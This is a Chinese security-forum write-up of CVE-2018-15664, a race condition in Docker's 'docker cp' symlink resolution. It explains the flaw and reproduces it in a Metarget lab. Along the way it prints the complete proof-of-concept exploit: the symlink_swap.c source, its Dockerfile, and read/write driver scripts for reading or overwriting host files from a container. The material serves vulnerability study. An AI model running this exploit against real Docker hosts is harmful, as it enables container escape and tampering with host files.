首页
社区
课程
招聘
[原创]CVE-2018-15664:符号链接替换漏洞
2022-5-23 19:46 14187

[原创]CVE-2018-15664:符号链接替换漏洞

2022-5-23 19:46
14187

前言

来自SUSE的安全专家Aleksa Sarai公布了编号为CVE-2018-15664的docker相关高危安全漏洞,该漏洞的CVSS评分为8.7,影响面涵盖所有docker 18.06.0-ce-rc2之前发行版本,该漏洞的根因是使用FollowSymlinkInScope函数时触发TOCTTOU(time-of-check-to-time-of-use) 文件系统的竞争条件缺陷引起的。这段函数代码在docker源码中使用较多,最为直接的就是 docker cp 命令。根据Sarai的描述:FollowSymlinkInScope的作用是解析容器中运行进程的文件路径,而攻击者可以利用解析校验完成后和操作执行间的空隙修改cp文件为一个符号链接对应的目标文件,这样理论上该攻击者可能会以root身份访问到host上或其他容器内的任意文件。

1.背景知识

  • docker cp命令

    docker cp 命令用于在docker创建的容器与宿主机文件系统之间进行文件或目录复制。比如将文件从容器拷贝到宿主机上:

    1
    2
    3
    docker cp container_id:file_path_in_container host_path
    #实例
    docker cp 0cd4d9d94de2:/Test.java /Test.java
  • 符号链接

    符号链接(symbolic link)是 Linux 系统中的一种文件,它指向系统中的另一个文件或目录。符号链接类似于 Windows 系统中的快捷方式。符号链接的操作是透明的:对符号链接文件进行读写的程序会表现得直接对目标文件进行操作。某些需要特别处理符号链接的程序(如备份程序)可能会识别并直接对其进行操作。在*nix系统中,ln命令能够创建一个符号链接,例如:

    1
    ln -s targrt_path link_path

    上诉命令创建了一个名为link_path的符号链接,它指向的目标文件为target_Path。

  • TOCTOU

    在电路设计、软件开发、系统构建中,如果一个模块的输出与多个不可控事件发生的先后时间相关,则称这种现象为“竞争条件”(Race condition),又称“竞争冒险”(race hazard)。从计算机安全考虑,许多竞争条件都会产生漏洞——攻击者通过访问/竞争共享资源,从而使利用该资源的其他参与者出现故障,导致包括拒绝服务和违法权限提升等后果。例如有名的Dirty_Cow漏洞就是由竞争条件引起的。

    而一种常见的起因就是代码先检查某个前置条件(例如认证),然后基于这个前置条件进行某项操作,但是在检查和操作的时间间隔内条件却可能被改变,如果代码的操作与安全相关,那么就很可能产生漏洞。这种安全问题也被称做TOCTTOU(time of check and the time of use)。

2. 漏洞原理

​ 对于CVE-2018-15664来说,Docker会将docker cp 进行文件复制的行为分为先后两个部分:路径检查和命令解析。当用户执行docker cp命令后,Docker守护进程收到这个请求,首先会对用户给出的复制路径进行检查。如果路径中有容器内部的符号链接,则先在容器内部将其解析成路径字符串,之后再进行命令的解析。

 

​ 该流程看似没毛病,但要考虑到容器内部环境是不可控的。如果在docker守护进程检查复制路径时,攻击者可以利用中间的间隙,先在这里放置一个非符号链接的常规文件或目录,检查结束后,攻击者赶在Docker守护进程使用这个路径之前将其替换为一个符号链接,那么这个符号链接就会于被打开时在宿主机上解析,从而导致目录穿越。

3.漏洞复现

​1. 漏洞环境使用开源的项目Metarget进行搭建,首先确保主机已经成功安装了docker之后再部署漏洞环境

1
2
3
4
5
6
7
8
9
10
11
#安装Metarget
git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip install -r requirements.txt
 
#一键部署漏洞环境
./metarget cnv install cve-2018-15664
 
#完成后查看docker版本
root@ubuntu:/home# docker --version
Docker version 18.03.1-ce, build 9ee9f40

2.漏洞靶场搭建完毕后,我们使用漏洞发现者Aleksa Sarai提供的poc来验证一下。下载并解压Poc后,Poc的目录结构如下所示:

1
2
3
4
5
6
.
├── build
│   ├── Dockerfile
│   └── symlink_swap.c
├── run_read.sh
└── run_write.sh
  • 其中Dockerfile的内容如下,它主要分为两个部分,首先是生成一个容器,并在容器内编译构建漏洞利用程序symlink_swap,并将其放到容器的根目录之下,二是在根目录下创建一个w00t_w00t_im_a_flag文件,内容为FAILED -- INSIDE CONTAINER PATH。容器启动后执行的程序(Entrypoint)即为/symlink_swap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Build the binary.
FROM opensuse/leap
RUN zypper in -y gcc glibc-devel-static
RUN mkdir /builddir
COPY symlink_swap.c /builddir/symlink_swap.c
RUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c
 
# Set up our malicious rootfs.
FROM opensuse/leap
ARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag
ARG SYMSWAP_PATH=/totally_safe_path
RUN echo "FAILED -- INSIDE CONTAINER PATH" >"$SYMSWAP_TARGET"
COPY --from=0 /builddir/symlink_swap /symlink_swap
ENTRYPOINT ["/symlink_swap"]
  • symlink_swap.c主要任务是在容器内创建指向根目录的“/”的符号链接,并不断地交换符号链接(由命令行参数传入,如/totally_safe_path)与一个正常目录(如/totally_safe_path-stashed)的名字。这样一来,Docker 在宿主机上执行docker cp时,就会遇到4种不同的场景,如果首先检测到/totally_safe_path-stashed是一个正常目录,但在后面执行复制操作时/totally_safe_path却变成了一个符号链接,那么docker将在宿主机上解析这个符号链接。

    symlink_swap.c 的内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>
 
#define usage() \
    do { printf("usage: symlink_swap <symlink>\n"); exit(1); } while(0)
 
#define bail(msg) \
    do { perror("symlink_swap: " msg); exit(1); } while (0)
 
/* No glibc wrapper for this, so wrap it ourselves. */
#define RENAME_EXCHANGE (1 << 1)
/*int renameat2(int olddirfd, const char *oldpath,
              int newdirfd, const char *newpath, int flags)
{
    return syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);
}*/
 
/* usage: symlink_swap <symlink> */
int main(int argc, char **argv)
{
    if (argc != 2)
        usage();
 
    char *symlink_path = argv[1];
    char *stash_path = NULL;
    if (asprintf(&stash_path, "%s-stashed", symlink_path) < 0)
        bail("create stash_path");
 
    /* Create a dummy file at symlink_path. */
    struct stat sb = {0};
    if (!lstat(symlink_path, &sb)) {
        int err;
        if (sb.st_mode & S_IFDIR)
            err = rmdir(symlink_path);
        else
            err = unlink(symlink_path);
        if (err < 0)
            bail("unlink symlink_path");
    }
 
    /*
     * Now create a symlink to "/" (which will resolve to the host's root if we
     * win the race) and a dummy directory at stash_path for us to swap with.
     * We use a directory to remove the possibility of ENOTDIR which reduces
     * the chance of us winning.
     */
    if (symlink("/", symlink_path) < 0)
        bail("create symlink_path");
    if (mkdir(stash_path, 0755) < 0)
        bail("mkdir stash_path");
 
    /* Now we do a RENAME_EXCHANGE forever. */
    for (;;) {
        int err = renameat2(AT_FDCWD, symlink_path,
                            AT_FDCWD, stash_path, RENAME_EXCHANGE);
        if (err < 0)
            perror("symlink_swap: rename exchange failed");
    }
    return 0;
}
  • run_read.sh 模拟受害者不断使用 docker cp 命令将容器内的文件复制到宿主机上的场景,一旦漏洞触发,容器将恶意符号链接在宿主机文件系统解析后指向的文件将被复制到受害者设定的宿主机目录下。

    run_read.sh 内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag
 
# 创建flag
echo "SUCCESS -- COPIED FROM THE HOST" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 000 "$SYMSWAP_TARGET"
 
# 构建镜像并运行容器
docker build -t cyphar/symlink_swap \
    --build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
    --build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")
 
# 不断执行docker cp命令
idx=0
while true
do
    mkdir "ex${idx}"
    docker cp "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" "ex${idx}/out"
    idx=$(($idx + 1))
done
  • run_write.sh 模拟受害者不断使用 docker cp 命令将宿主机上的文件复制到容器内的场景,一旦触发漏洞,受害者指定的宿主机文件(localpath)将覆盖容器内恶意符号链接在宿主机文件系统解析后指向的文件(w00t_w00t_im_a_flag)。

    run_write.sh内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag
 
# 创建flag
echo "FAILED -- HOST FILE UNCHANGED" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 0444 "$SYMSWAP_TARGET"
 
# 构建镜像并运行容器
docker build -t cyphar/symlink_swap \
    --build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
    --build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")
 
echo "SUCCESS -- HOST FILE CHANGED" | tee localpath
 
# 不断执行docker cp命令
while true
do
    docker cp localpath "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET"
done

3.启动 run_write.sh ,恶意容器运行,然后不断执行 docker cp 命令,漏洞未触发时,宿主机上的/w00t_w00t_im_a_flag的内容为

1
FAILED -- HOST FILE UNCHANGED

​ 如果漏洞触发,容器内的符号链接 /totally_safe_path 将在宿主机文件系统上解析,因此docker cp实际上是将 localpath 文件复制到了宿主机上的 /w00t_w00t_im_a_flag文件位置。也就是说,此时宿主机上 /w00t_w00t_im_a_flag 内容将被改写为:

1
SUCCESS -- HOST FILE CHANGED

​ 如下图所示,漏洞成功触发:

 

image-20211209215928690.png

附录

源码 docker-ce-18.13.1-ce

 

源码1:docker/pkg/symlink/fs.go:FollowSymlinkInScope

1
2
3
4
5
6
7
8
9
10
11
12
13
// FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an
// absolute path. This function handles paths in a platform-agnostic manner.
func FollowSymlinkInScope(path, root string) (string, error) {
    path, err := filepath.Abs(filepath.FromSlash(path))
    if err != nil {
        return "", err
    }
    root, err = filepath.Abs(filepath.FromSlash(root))
    if err != nil {
        return "", err
    }
    return evalSymlinksInScope(path, root)
}

参考链接

  • TOCTTOU相关知识

https://www.cnblogs.com/liqiuhao/p/9450093.html

  • docker cp 官方文档

https://docs.docker.com/engine/reference/commandline/cp/

  • POC

https://github.com/Metarget/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664

 

https://seclists.org/oss-sec/2019/q2/131

  • 其他分析报告

https://developer.aliyun.com/article/704515

 

http://mayoterry.com/index.php/archives/69.html

  • Metarget 开源地址

https://github.com/Metarget/metarget

  • 了解Dockerfile

https://zhuanlan.zhihu.com/p/90437739


[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

最后于 2022-5-23 19:48 被ZxyNull编辑 ,原因:
收藏
点赞3
打赏
分享
打赏 + 50.00雪花
打赏次数 1 雪花 + 50.00
 
赞赏  Editor   +50.00 2022/06/15 恭喜您获得“雪花”奖励,安全圈有你而精彩!
最新回复 (0)
游客
登录 | 注册 方可回帖
返回